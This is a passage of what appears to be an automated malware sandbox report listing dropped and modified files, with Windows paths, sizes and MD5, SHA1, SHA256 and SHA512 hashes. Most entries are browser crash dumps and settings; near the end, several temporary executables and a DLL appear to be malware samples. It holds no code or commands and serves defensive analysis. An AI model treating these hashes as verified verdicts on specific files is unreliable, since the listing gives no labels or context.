eec081220d834a12c1625a759ecabca4

SHA1
6bf9c1b3760504f599b75492dc02f116b5d8178c

SHA256
be82c2575b477e81cb08feb817cfc229e9054dcbd3e6a897c622cbeaa9be398e

SHA512
92d14e15ef2ece7ea419597088f494e19b4cf2e1f391fa770936769351101fc8777011f0e616a7df5d42a7db30e0fc98c6b89853f5dd0bea7cc25be833d8a994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6e27c9ad-b0df-4a4a-831d-f4fe1d2f428d.dmp

Filesize
844KB

MD5
220d0dae89e4537be61bb6992df24cb5

SHA1
bb93ad361e1aec5fab7de0969b17f777fe1038e4

SHA256
01eaf9a7c76bccb8e9e8598b0ad278c294dd3799cef3135011cd3b435d8acd3e

SHA512
48ad4c7fb9118dae0eb98deb0cf1d6dfbd67196e38fc7e857578973e56b92235e25644b874e2b1d76f808f76f616ff3f5a4d6779e47df7bf10a3d2625599a81e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\747e4d4b-a3da-41e4-b533-21f919b09763.dmp

Filesize
836KB

MD5
144284bd792da5dbd72c8a8d8c3eec0e

SHA1
6ae3779e7778545dd5be0e47765f1e999d017001

SHA256
3f0cb2e483099d6fca62d0016c53bf62a57146b56533d7e28b3d4f399610f713

SHA512
7f2cd37d04977e9659162bd459626b1c007e5e2a3569c0aea99dd1fbd3aefda807c733c591657d659f7e5b5d9351a4162190ee2b2da199d61e1fa39c9345f2a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7881120d-dec6-4004-baa2-bcc8db0d1106.dmp

Filesize
836KB

MD5
eb63a878706db3d5705adac2837f0fe7

SHA1
2defeea5df0f18dac28a527a4a235f12182fcd6f

SHA256
ad784f2f95c8aea0c4f35dac4aac048055f7f5b77f29a38f08bab99eb99d7b2c

SHA512
a6ab49be19c0942fe9240a77c41c612747b4fdc3869a80b7c50f3efde14d1d84d7fac74fc5e33cdf402f3b18312e3270e86b1228b8870232c1aaccf2639e99ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7c766906-a022-42e3-8371-22eb66d945e6.dmp

Filesize
6.2MB

MD5
e12b417118e1b3964eea423f5386a191

SHA1
174e5eb7dc0a8683ec357090aba238ecbe415ee4

SHA256
2b5eeaa1634b942e86137ec67462d9ff3355b9efe6e1046a312b667a9ad33320

SHA512
17d31ef680c41c220f9320342cddda07cdd395de8ab1faf8a7dbb725da8fda984110b6915582d054c48f7568e950a0df89a931b5a8694cd2cfd0cc7887aef1c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\81646c3f-2ade-4272-ba60-4d48aa5a275d.dmp

Filesize
844KB

MD5
306959d784d83996f348a14e1737d97e

SHA1
6ce7c36fe6cec1a94bbf31460c042dba4f2aad1e

SHA256
26c0bad8bb7b3ff44bac95fad27edfcbf7e05ddb6d5b47967a2cca76ffb9ec82

SHA512
edc67dc6e41d4c6e6472676f2a28562eada5c114858bb21ab1d4bd9023aec0599f025f82b651bf83c64a2bcde165f5fbe8de8286b75dfd3d38e6c509d59eb046

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\897fe13e-4452-4caa-8d12-3bd5762c6791.dmp

Filesize
836KB

MD5
27d8dfadc2a6221967fa0ec7a7cc0380

SHA1
a2f355c1749b12206bbec6a59f37c8a7d4ac148e

SHA256
739f6264a593eea640d539d8c84c757778fc5d9b5c6c04ebaefc1e5fc8b98151

SHA512
24017e0a7e5ff659b5cba3ca58e5a40fa546008228306bcea9c24080311c4572cee068adab48befb6bcac1c5781541f1be228f67e5dc99f04c9310d025c89fab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9935c114-392b-4319-aca6-e5e434903252.dmp

Filesize
844KB

MD5
fd8858c5e571fa3ac56a247e0119e709

SHA1
6c09dfba266e5157c8fc1575f53147c6cd60d8ae

SHA256
0566a5d50cbbf82ce6287136e454f06be08672e1a666e39b9ce5457f10328d3d

SHA512
9691c54c243d01031f624d3d788aa0eaf9df26453e0bb11139c66b5dcf24cb7504831303773b70a2f2e33a8090cdd2968013a917d9cd2747435043f551fb9db1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\aac36bfb-4d72-40f2-90cd-787ca549f579.dmp

Filesize
836KB

MD5
79d659c1f99f034d38a7e28841a45e93

SHA1
41ebe565bd29eeb25b04f33498d30081c6eafb4a

SHA256
e356e968ed59305c525a4924fdacd96a6bf91c13bbb8866d68857de4863f58c2

SHA512
549383308126ec5fd2e23ada46183bb166bd5b6a7490079247a6901a09a62aeea4a44810a27f0498a5018ada15e22101715496c0b5055cffcae00c6d117d0b63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b409074a-aabb-498e-9a5e-4f7d88ea2567.dmp

Filesize
836KB

MD5
cf4da636a321c621aa2107565ae8e4da

SHA1
a9bbf642751a4f3f24ffa5f11f7aa4b52f7b7a93

SHA256
916cccc6c666b21144a75c9d4e8473ba5a3a16f8c913231a344aff8c44ef32e6

SHA512
1375387c6e078eebb709f7370927760563e9ace9eb1d5598080cbe44a4ee0c7aea6e5b1a416cd2ac4d20f739bcc9429a64f70aac486210208885ab9f91cc9d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\bd8f5d2c-0586-4266-a756-f5b5305d3b98.dmp

Filesize
836KB

MD5
b6e61bf04b21b00ca3e113883f2aaf1a

SHA1
9fa93e3f10396c33f1dda173f99674dda2da5616

SHA256
b22d8f211e3da63b59e42bf9f2ef38ed99b8bf9d086d70a1e185191dc28701f9

SHA512
1ae2b208d2a8e091b9f5d6549d3de6bea9918a59cf920158da5669f1d2d35e04fe5d187bc87e881cda540630033e7ee5bbb5cd4a5984d52a268343d545267525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c0a1bff2-0b1b-4bde-9805-e1ff1eefc2c8.dmp

Filesize
836KB

MD5
e3de48279fa1c6b97a08f7e981d463d5

SHA1
dd68e9ee8336015bd99af030b26c51af42c59e47

SHA256
7ea78e8e455d6a27b752669dbaedceaf66563ab3b1989ba6f6ce096e5bd6a205

SHA512
704e36cefce0c935ddf52845f0785045ea4f1293bd2a25d9d83c5a8dfbcc1044e39dd645b385725dd9133a10a8052a8bcbb96fd2b0044d1558d6967139551a18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\dc573304-a9c4-4fbc-9043-4f4aa0e037ff.dmp

Filesize
844KB

MD5
9333f66435b3c686e127bea045dce097

SHA1
a64103af54a24a0d49f935fc18165a9dbd4d74a3

SHA256
9b7c750b7f1ee21baf75cec09aa002b23e18349643dd346ea2e9659c6bec5a7d

SHA512
deeaa23302e12c5c83a838c2879456c0ff8ac7aaf719b43181b4fc18ce7fdca40f6bbaba9c4e2be30f3dfa80fb2a1be515707ab0838e8d5923d47ae2b65a3708

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e2e44b6d-9eac-44e5-83da-a392d50a5922.dmp

Filesize
836KB

MD5
822af549bf3ac9c02a10b90d21470180

SHA1
6ad25eb3f47552f37bfda9f38b48b031092105b6

SHA256
4fc2e3a610dd7fd672b6e77aecada39d43c485c1e4a837360e8691a317d8d3b5

SHA512
fbf663d8b7bc0127bd8c4835fe41a9909bdee3f8df1e8452ae2337651fa394c4b6ab500d117b0a077c7dd5de8c7680640a596f44866f37d9ac770b75c9a211bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e8b85827-fbed-4191-b7bb-67ead5c96155.dmp

Filesize
840KB

MD5
6d9f94410a7fdcba857f9bc6766da9af

SHA1
a2bb955641994132ba775495fcfd30f670eac73d

SHA256
c818e78129f0d845ed49b2ff49a0490296d5997cb53f96c3fe4773972c4c1736

SHA512
153951a0bb0dcd9b123d95bf2bace76c81a99e340e1ebdefed74a7976f0fc42fb395a37b876d4c1e6b54c80786b6725c1b3793e4608def6473301e450a4eb374

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e93554d9-3688-4121-97ab-2fb45ea3918f.dmp

Filesize
836KB

MD5
a08bcad11f9dc4abc7d8fdb12b15973f

SHA1
ab5897d17da5cabb71ed3f33061ef048e74c6cdd

SHA256
5760c888c9f91e32ade6ec92d369428085438e7ff4f0c59135bfd356b7285caf

SHA512
90f59f442ff8fee45f4751fc43033b6a55301d4a6313de59773db6d2cfa5e2258d3cf27b5e06d79dd09cd71d0d1d430dac1c5429ff722c78724180ce35a6d1fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e9540bff-403b-41ca-bd0b-bb8945a747c1.dmp

Filesize
836KB

MD5
e7a7d61a401ec3c55e801c0e8fd7f26a

SHA1
48f9f4b261711fc7511f2c19d2bd4a5534b2d6eb

SHA256
3cc3165f250a70d957202e587e55daf76d570e6b4f88403f3a9696a43dc802c4

SHA512
533f20f037b604c971510956a1df79c6dd10c5c5d34ab67300bfc3087bde8d2ffca20e273feb17b55953e9f965e1b17d014ff719fe0bae92342ae58ee9c8e0e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f02405ea-e872-4d90-8572-7f356d7c04a0.dmp

Filesize
836KB

MD5
c947eed9f7b2c6b12f424d208a2ab9ad

SHA1
090ac2c957ef1e4830d46e7f4298fc8aca867d68

SHA256
9f75a136f5feed6631df27dc72a3db9febb7263012021bb7d44d334388668497

SHA512
bc6e1ff5869143a43aec9db20a149d75625e36ceafd724afb49913d8f7e0f988b7f2784326d474b0b4fbd653750c970ce652c7e62504da1155e9a3159f0978a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\fa1d6f90-f922-4124-afef-d9bd258dfb23.dmp

Filesize
840KB

MD5
dfd5227d211ad872ce342bb6e9083f92

SHA1
0fbc6267ec17c478fc5b16235431796dd780a9f1

SHA256
26b21e972ec3963e48f427f5e0be6c6758c36973658f9342769cd033cef45afe

SHA512
1f51ed6173ed53c24c0b218150a3504a15ae5033d1b3dcb0aae25292f2c3862bdd190183d8e7bfb07f38dfd3321eccc366f105b57e73d9283e6e9391a4b1eb29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\fddf8e1e-62c7-4231-8e1a-94271c32efde.dmp

Filesize
844KB

MD5
95d015bb1f80d6ef020e482ab40cf1b5

SHA1
04439bd7a558d63b3d299af2fac4558e115d331c

SHA256
6503aa012752e751e20b2e015e76a3a32b5d3f36a2e07137da3381359b201b8c

SHA512
1642f746e80934fb7a4b3bc570466d98cce7788130a442f50f988644ab05340e72747d5db993562fe8b2ba51695f82f82a0bd74e97e626653996cf1f24224d66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c787930d470d0be053d565378051623e

SHA1
28e41641d6c01ee6eac6d8da2b1bbcdf846bbaf0

SHA256
a80de15c02d30a203b3ed152d11995318fe79a4eb99fa6de1f5600ad6623248f

SHA512
9736fc38006a0e8bf29a1c87c251afa1d47dfbadefbc16e844c15d626dc7d0aad622e3bd0925f3abe745a312914a3e9db2026439cbbd2a752589d1f3499aeb7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
426aff63920dfd96c263f6376b5cf83e

SHA1
ff109807caa073912751331fecd1f40a5b413bb3

SHA256
ed508b1cb8fe20e6e6f57b72dcf5b55511e98d5bcef68740b964aabfb5aa5fd8

SHA512
641a849ea75c608a0789dfafc6c1c0a4c39a4d7d52540add26677a8eede1c7a9e2a177164cbe813d5ed841d089bb6687566584f1d2c299b2ca2dffcd8dcf1d5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
477d0be72559756be60c6d00938b1f89

SHA1
e9dcb49533c2de1f57ded5c63ff6bf26babe4401

SHA256
f93b19847c56c9f0cc1d29839d5f5c8f26fea4b6fb0c0995a2d423914d4f837b

SHA512
d245f4e80c463ec776055b03ee397639a9c8527b92f5eb842e19de399b6142c679de08db8fe85c5c94a74404fee876dba6438be9d87ab02309076fc275054a1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5fdc0efc11e8cbc5520f595b4a4cf0ee

SHA1
914034b8ba7f8118bc4cb7545cc5d3fe64055625

SHA256
f58bc38caf3fd9657edc031e50acf25862b5a352b4226aec524c39883df4de44

SHA512
437425f727f8fa47502f98f74db2cc4452da7d7c4aee15e979f53260c3f80a0f75eadea091f41e96c13f41e0028f800c4cafcd99f051733890cdf3d2b3d11c72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ebf9f0dfe0012c3d299b72904ef8fb7f

SHA1
7155ac315ff911ab1e5d8eb70184bb3d14f33e65

SHA256
eaa16f31cf06939a28cb02716a78985744d400723a99b41ff3f84b8f07ae9601

SHA512
70f221de61c6b8efae5766562e9501d2f624cf8b57689ef48542eb540c50650911174e74513be34ddaf1fe61f6c30c60f5107a0a5bba5c8850b57f1fa13178a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9501c5edd6f041ad115ced8a6137d55c

SHA1
ed2bf8311d1c51478431d13021f1820b72bdb4d1

SHA256
d9140eab9823e5d035eff85301628fe85c4525bd662bb62b147300b713dbdadf

SHA512
4fbf2344babf76b87d2ec30794604eff18b25a40e85199543e2b03a88a3827626bcbe23d1b42379fab7e0d8cb4410a26796ba18b8b14368bbbeecb2560d3800b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
776a0148765b8d5391b2436088428dc1

SHA1
56393ec7c87b0490534d5349a80b9c0b9a6183c1

SHA256
08e6658a4f69fd8c93559a474268f9b91259094143c09b61c9293de26bbb922e

SHA512
d07b889cea0d19572e9f28133126d8c9e2b8b137e73d4039cbe6d2b98fe6006a0a52ca92e2bd53d6f2308d9c3221c7c03681856be0ed0a891ab738c3a09c1e70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aff88e9e7d9984903be657186a7bb4d0

SHA1
cc716200120a7623e35f5d209353e7b1e80e1861

SHA256
03e27dc4939526ed5ec36d822ca3db498544f61f8ee2620dfa78a363de3c29b1

SHA512
5dd10d5c4b358e79b6a683f5b5c1ce4cfd21f980081fd44ee6cc1d4f6a4695697d54e24e6e36cbf18ce12b251608316a0645437945702bdb7c49d37134d88337

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53e92c0e5ece735501b6de76bfafefb8

SHA1
1f13f365a6362e95d4938be81fe61fc5510101c2

SHA256
6eb39685f8c435483666a6ad6029c604162fb36cad740525831c2da09765e931

SHA512
bd28e2637fa59daefba421d022c8961a775f2768872c218b49e3b44fd1954e4fba738e6cee9ec1e486ed2ad68ca1c38724fb9a5285f6b2556f4ce0f9a0f0cb0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cc293811a4d9f593ce3b5ff6d7565550

SHA1
20b1a2d67a103b8cc7bb9cb584e467c734c26567

SHA256
bbae6fb59157ced3716709a92635ad4d9d807c48eaec80825d75d6b9980a6acf

SHA512
6f9d85328b6b31439301c58083f8fa16cb4bba9ee0916b016f218191a960c754056a174d18bff5431680e18520a8f9124d9e88f7768bd373b5dae486870788de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
45f138c6d7ad2c321edaab92e1373ad1

SHA1
ee7ad89614400648ddc12204104fc971dd5c9432

SHA256
205a0dc93fde4f360297c1cfcd071190932ffc77dca92d11e21a48d811742065

SHA512
d4cdc7bd132b73fb36c99462ffb140c019164ef7b2791ffa5f242eb4c324d29b519670bac3c89cd0037ded6a4beb3a9550e3e1a8d228814f32ff439370386764

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e0057c2e84f968bfa2fc3b67e80767ff

SHA1
67e46afd89e9f06853141edea1bb077a6d460af4

SHA256
4978548b50d5f9be5916d393255573a2b12e15370de8ce6ac78d6462c67a9594

SHA512
d63d887995c4bbfb7741eb1c83a7a9ef52fe2632cf0c0ab56c59d49558d6f652aca8291204b7c8c290dc401efee7753328224b70d54975a310782e61ea967f67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9d25bb6540b22c6b6018e0d0f1b275ea

SHA1
9853884fdf453a8a1f43b56ab1cc68c58fed2869

SHA256
bffc4666293212d673fc47dcd16f291f7b3164c164ab0b62cff0705cd3833cc4

SHA512
dabfecbf5429117d4e5c32181d27e57605d6cd7308ada955a5467677aefe004fd1e1e93f6ed64212b1f8904bdbdb0fe76c1799eda29a1cd79540a034963528bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3620f0fbc24d6c87d2fd40ea3ddb8a66

SHA1
70081d3edf6bbaf713d11e92627266d556bfe742

SHA256
fd122a23e7eefb837804977135abab0252e5dd147cf8bebf2069b3e5d23df0d0

SHA512
6047b82ede10d7bd90a486384466c00daee7a13be981de2607324b05d52878d0e8c298a2e3fae5940b983d65e8ea2d7214cd2250fecba9113797e80cfc17ec12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\317fb45c-a953-40ad-b90c-aa06d5560df3.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
de2348a4cfebcd6d7b5cc444fbe817ba

SHA1
b2b65cfdc83a135425ded7a124103c96840ceff2

SHA256
8740368cb2b0d3b84260a3e274d2384d13d7afd643f7cb0d7ecbca41701a939c

SHA512
190032f77dba2e852e6f02f92bc828a1ad9f9a88f02eb70c1f900e0db47c80c2159e35e380ac13a08d56fc5a945f7704a9c3f3c2cca24223c52e9145c663a386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1e2b3cbbfd348fb933722b0b214f583a

SHA1
f626bc0e9b80741cf9c5a99b6bdfb02f0696fe17

SHA256
0b15516428a50c91143d45ff9c8676612b7c8c27d148aa472b1402786da9425b

SHA512
1671a65dca68df151b183074712b896c7551f7232907e6bb4deb940cc46f4eddd118db67cc3649af34e90170a60040ae0ec8fdb03501fb10b8e13df3ec8b1a83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e8725fb3beb34c3a51c06498aec153c3

SHA1
3c3e7735bf575d79d98e627ee3f6e084cd2e14fd

SHA256
44a30426bafe928965cc69c88a32c0e251f9a2bd5170b77ca70ed820573de44f

SHA512
1fdd544a5680aaf56d8a2811beffb89d077cdfccf5c731b5e5e98d5ff7a9b3c9ad89b8d0c377e18e2a7ecfed81db677be6cd7561e29a693a587783ec7a18e0d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d6055e53c17bc9e11b4a3a01d8d44619

SHA1
fa554fbd0fe01d474c20b5a66672a9332fdaad59

SHA256
f84810825be2f1786d3952a4d8ceae662155490793bbbcbc3bdd043a75c2f3e5

SHA512
2c04fddfaf6454497b5c3710fd2d20d8477a364fb3604290d0f4a0b9adb980dbc90c90cadb209bebfa24efc8252cbaae1726a346a181dd3d539707c35cac741a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
42f2987959da9781a956e4aa55ec2001

SHA1
a2f8d5321d747617a8c3064eef2d75c3fc70aac8

SHA256
a2aa6148ac5c4ffe34eda30c70d31d2cd618ae3c0ff19f739fc9a724331c1a3b

SHA512
1fcb7faa702f6bc55ef00ee24ff1ae5499ef13284d67ddcbc2e2eec606ef493de3aa50c99dc3e41a99620d6806a0adb13dabe186b5d7fee62fb1af38d5707626

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
66aa46c4fe67ffe9e71ec2a5dec633dc

SHA1
fe554ff748b76129ab65eb368fb5486fcdc9b05a

SHA256
95e51bd8a2d85e014205fe31b851975eb0b334262e27567a223d7bec9eab3221

SHA512
32f176e9db80de6062e76eb85b03225995ebccaaf33acd63b50f9e325cb9f71a23c3d086dd55cb42249e758cab3b8177c1e944f2c4894d2f39103230d53fa631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
01c4b3c8abaabace162a46edce81bb04

SHA1
01f42cadd668fa67e3acdbfb4be9daba3d827f7b

SHA256
70970db85909716f2d722c397e4f2bf1ab50cd7672ddad6e201fce0b4fc02f1a

SHA512
6b75fc422b152687b12dc151fa6f537f039ba587e0fd06ac30677be51e30d0a5d47383d0f28fd244b9d16ecf3cff0c8e1803d2996ea7402180f55947c48a6a22

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5k8zi25l.default-release\activity-stream.discovery_stream.json

Filesize
25KB

MD5
9918abe1e6427112f2a144d3b7976c2f

SHA1
91612e928c6cb48b2cb4fdb04f542ca347530834

SHA256
e581b2d5fab4be8c2755d7bdae73311af11a4e422bfb049ba7b8014d69048d40

SHA512
e3ca817b3f2007571fc90734519c9ea1ee862eb2db0c1e992e969d60e9e72020225378319ce6b4d0a4bb7d9bfd4bb20964515aa3809ac6999c7782179fea24c6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133863927154312150.txt

Filesize
85KB

MD5
125cf8028e9bdaa2dcfefe1488b50c1f

SHA1
c1850f5d92abac2c9d2193256ba7ae296ee3bf58

SHA256
9bcbab74e0324cd5492ea36aed2a0580c60dc666a2dcb7e7a6b16cc2be05c049

SHA512
66be2f8c24f009e55d041e480b4700201b33195f2ade7071695d16a2b7a9a760e07e2e79f1798c792b90bd095aa6b33c1709d8a3e9070b6fa04e44ecee9f39fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip

Filesize
669KB

MD5
963a766b3b8d33b4f0471c74b9cbec7c

SHA1
e342e54e02d430c2c5413d85d775c696fe1289f8

SHA256
7986641712e76a0b74fe66dce29d9bd7d3f37cf9f70e91424fa38d51a2297bba

SHA512
cc75571ca52a54471dc43359d7ab984898c90f634c73a24d32a7bd9ac632763b679a876e87b292cb33327eac50640d0b6383473f669a8035a50f048a34ef8b38

Download Submit
C:\Users\Admin\AppData\Local\Temp\52853371

Filesize
3.3MB

MD5
5da2a50fa3583efa1026acd7cbd3171a

SHA1
cb0dab475655882458c76ed85f9e87f26e0a9112

SHA256
2c7b5e41c73a755d34f1b43b958541fc5e633ac3fc6f017478242054b7fe363a

SHA512
38ed7d8c728b3abaa5347d7a90206f86cc44cf2512dae9d55a8a71601717665ece7428cbecb929a1c79a63cc078c495c632791d869cc5169d101554c221ddae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\BYKNLOLR1L9ZCZTG4KA.exe

Filesize
21KB

MD5
c11a82d699a06d9b8ba4296e0c562ae4

SHA1
e91963fe8def3ed151333a6a66d005237600ba30

SHA256
483b1d7dac70de82e9b22a0c1ed775cf7e10b0a3790c5aa1b9215dbcd1754302

SHA512
cc8644279ea2cebf70f594f6cc48d6ebbc10d036b7dcf1008fc05565da85cc36f7e8af7faa49b7c117c9a6ac94d7c007a99b53ec1dd668a7f8c28dc25b410a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExtractedZip_1cf60734\g2m.dll

Filesize
769KB

MD5
6353dafc0eaa95556eccc6f24dadcc0a

SHA1
1956a19986915f287a0e7f9655fb22c64be0a7f1

SHA256
0634096a636308e3f70f517f65ffd5f40e8aa0c09eede5ecbc2cafd4664ad084

SHA512
ce62e01a5669645cad2bf81680088bceae94bfe877d07a573a578bc13d2b14006169b2f0bbdc6755ff7e90643ff75c8ab086457941f148e6945f17c007f42015

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe

Filesize
39KB

MD5
f1b14f71252de9ac763dbfbfbfc8c2dc

SHA1
dcc2dcb26c1649887f1d5ae557a000b5fe34bb98

SHA256
796ea1d27ed5825e300c3c9505a87b2445886623235f3e41258de90ba1604cd5

SHA512
636a32fb8a88a542783aa57fe047b6bca47b2bd23b41b3902671c4e9036c6dbb97576be27fd2395a988653e6b63714277873e077519b4a06cdc5f63d3c4224e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
1239994e92af213f8e1bd7b14b079688

SHA1
ea9782126bfac6752107af1bc71ddcfb86ac65ec

SHA256
f9f122365ea841a45eec1e7df85a9aaaac10be11eff2fe3e604f9b580b51a442

SHA512
16fa4be5d1aebd470f73699f7b87c17d8f1a5e9f4f063fccd1df7214b8bed30e4392e1e87ef8efc067e50ff96cc49f9cd28658dc0e306cf39d63987a92400eb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hjxmhjbq.2sm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe

Filesize
271KB

MD5
5f50b984c501fb32eb624e9c6e4c6f03

SHA1
ec128ae24a807d8ea4d78d39b15a210ca0cf848a

SHA256
19a74290a0ba87305b0ab16bbce30728872087418708481ab8b0d90ae9e6194a

SHA512
4d40dbc603aae256cf3b8273f8776f4ebb4c237dfae1164ec8e9cb64dfce22bccfeee2f47ab983f75fd75aeb80b842ef94adbcf5db3dfd2a7ef0790083c1bfc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\12321321.exe

Filesize
348KB

MD5
ce869420036665a228c86599361f0423

SHA1
8732dfe486f5a7daa4aedda48a3eb134bc2f35c0

SHA256
eb04f77eb4f92dd2b46d04408166a32505e5016435ccd84476f20eeba542dafd

SHA512
66f47f62ce2c0b49c6effcd152e49360b5fa4667f0db74bff7ff723f6e4bfc4df305ae249fad06feeaad57df14ee9919b7dcc04f7a55bb4b07e96406ed14319e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1776871603.exe

Filesize
3.5MB

MD5
8bede54b9c4860ddcc2363cd2cf561b5

SHA1
feb2808b79d444ff96f1fc29cf119a1c87a543a1

SHA256
450b033145869b6b0dfcf0b1c5dd05044234402957ee9cf76cc56f24487e6b17

SHA512
39028cdde8dd234ed2357ea6cec254a16dd11fdeb719bc42acc2d2bcb5f35242a4bc604c328018e8f12524df8fd70c4a2569de4f2aaae6799a3b717982114a4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\3601_2042.exe

Filesize
2.5MB

MD5
d86c66ccc7fab1a4ac17ccaff6ebb237

SHA1
0c4036ad52e2dbc5aee74732294f55e2c6840143

SHA256
cf016c5b75078a3747b27245c1d75dd2da888f5a14fc29609a3d3b9647efd8f0

SHA512
4cc74b59e929ed9c89fde61be5a63179859e267506551206f5ed603fbb7d00f0a31b2e958575cf2a05e52796d51fea645e16e991f00a57093c2bbbad716bcfee

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\8998_3800.exe

Filesize
2.6MB

MD5
